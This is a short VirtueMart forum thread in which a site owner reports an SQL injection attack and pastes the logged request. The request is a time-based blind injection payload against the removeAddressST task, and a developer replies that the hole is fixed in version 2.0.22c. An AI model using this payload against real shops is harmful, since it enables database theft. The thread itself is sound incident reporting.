Text only | Text with Images

VirtueMart Forum

VirtueMart 2 + 3 + 4 => Security (https) / Performance / SEO, SEF, URLs => Topic started by: Arkadiy on October 03, 2013, 05:10:27 AM

Title: SQL injection
Post by: Arkadiy on October 03, 2013, 05:10:27 AM
Щn one of my sites using the SQL injection was considered users. The injection took place in such a query:
Code Select
GET /index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=1%22and(IF(ASCII(SUBSTRING((SELECT%20Database()),2,1))=112,BENCHMARK(51544503,MD5(1)),1))and%221%22=%221 HTTP/1.0
Title: Re: SQL injection
Post by: AH on October 03, 2013, 09:31:28 AM
Version of VM?
Title: Re: SQL injection
Post by: alatak on October 04, 2013, 08:53:24 AM
Hello

This is issue is fixed in vm2.0.22c
Title: Re: SQL injection
Post by: AH on October 04, 2013, 09:42:04 AM
Thank Alatak
Title: Re: SQL injection
Post by: Arkadiy on October 04, 2013, 20:16:50 PM
Good.
Text only | Text with Images